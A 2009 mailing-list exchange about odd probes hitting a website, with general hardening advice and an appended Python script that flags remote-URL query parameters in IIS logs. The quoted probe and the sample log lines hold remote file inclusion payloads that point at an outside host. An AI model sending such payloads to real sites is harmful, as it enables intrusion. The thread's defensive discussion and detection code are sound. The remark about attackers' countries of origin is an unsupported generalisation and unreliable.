[dba-Tech] weird website probes

Jim Lawrence accessd at shaw.ca
Fri Apr 10 12:41:53 CDT 2009


Hi Peter:

All sites get probed for weaknesses on the web. That is pretty standard.
Below is a list of common searches performed by serious hackers looking for
opportunities:

1. If any of your directories are readable and have important data that
information can be gleaned. If you have any important data in a website it
is open to anyone. There are many open-source or free products like
'BackStreetBrowser' (http://www.spadixbd.com/backstreet/) that can copy a
whole site as fast as the bandwidth will allow. 
2. Any directories that are writable can be used to either store temporary
information or leave time-bombs in hope that you may try and run them...
some gullible or tired webmasters have even inadvertently spawned zombies on
their sites that way.
3. Some sites that have open FTP (command line) accessible and even password
protected may find someone running a little loop routine attempting a
dictionary attack... given that there are usually no limits to how many
'tries' the hacker is allowed.
4. If you manage your own mail within your website, build your mail service
correctly. Use a Captcha, return email etc... Any web site beyond a Postcard
site needs a database and a programmed backend for security and management.
5. If you do have admin access from your site keep the password long and
filled with mixed cases, numbers and special characters.

Outside of that you are really pretty safe. 

If you are using IIS, check your logs and see if there is a consistency of
login attempts: c:<windows directory>/system32/logfiles/*.log and if there
is you can block the range of IPs through IIS > default SMTP > properties >
Connection > add. The site http://whois.domaintools.com/ can be a great
source for specifics on a hacker's locations. (I have found traditionally
clients' attackers are from China and central Europe.)

You may already know all this but I HTH.

Jim  

-----Original Message-----
From: dba-tech-bounces at databaseadvisors.com
[mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Peter Brawley
Sent: Thursday, April 09, 2009 8:36 PM
To: Discussion of Hardware and Software issues
Subject: [dba-Tech] weird website probes

I've taken to studying NotFound/Unauthorised errors at our site. We get 
hundreds of weird probes a day, mostly in bursts, eg just a few minutes 
ago we got about a dozen of these in a few seconds:

www.artfulsoftware.com/php_mysql_win.html%20%20/index.php?var=http://www.candidography.com/zero/id1.txt??

www.artfulsoftware.com/php_mysql_win.html is a real page. The rest looks 
like a probe of some sort. A probe for what? GET-based vulnerabilities?  
Anybody have an idea what such vandals might be trying to accomplish?

PB




_______________________________________________
dba-Tech mailing list
dba-Tech at databaseadvisors.com
http://databaseadvisors.com/mailman/listinfo/dba-tech
Website: http://www.databaseadvisors.com
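
Added example (not part of either message above): one way to apply Jim's suggestion of looking through the IIS logs for a repeating pattern to the kind of request Peter quotes, where a query parameter's value is itself a remote URL. It reads IIS W3C extended logs, flags such requests and reports client IPs that send a burst of them. The sample log lines, IP addresses, host names, window and threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl

# Constructed sample in IIS W3C extended format; IPs and hosts are placeholders.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2009-04-10 01:30:01 203.0.113.7 GET /index.php var=http://remote.example/id1.txt?? 404
2009-04-10 01:30:01 203.0.113.7 GET /a/index.php var=http://remote.example/id1.txt?? 404
2009-04-10 01:30:03 203.0.113.7 GET /b/index.php inc=http%3A%2F%2Fremote.example%2Fid1.txt 404
2009-04-10 02:15:40 192.0.2.5 GET /out.php ref=http://www.example.org/ 200
2009-04-10 02:16:00 198.51.100.20 GET /default.htm - 200
"""
REMOTE_URL = re.compile(r"\s*(?:https?|ftp)://", re.IGNORECASE)

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split()
            if fields and len(parts) == len(fields):
                yield dict(zip(fields, parts))

def has_remote_url_param(query):
    """True if any percent-decoded parameter value starts with a URL scheme."""
    # IIS writes "-" when the request had no query string.
    return query != "-" and any(
        REMOTE_URL.match(v) for _, v in parse_qsl(query, keep_blank_values=True))

def find_bursts(text, window=timedelta(seconds=10), threshold=3):
    """Map client IP -> most flagged requests seen inside one sliding window."""
    hits = defaultdict(list)
    for row in parse_w3c(text):
        if has_remote_url_param(row.get("cs-uri-query", "-")):
            ts = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            hits[row["c-ip"]].append(ts)
    bursts = {}
    for ip, times in hits.items():
        times.sort()
        start = best = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # shrink window from the left
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:                  # a single hit is not reported
            bursts[ip] = best
    return bursts
```

Calling find_bursts(SAMPLE_LOG) reports only 203.0.113.7; the single ref= request from 192.0.2.5 stays below the threshold.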



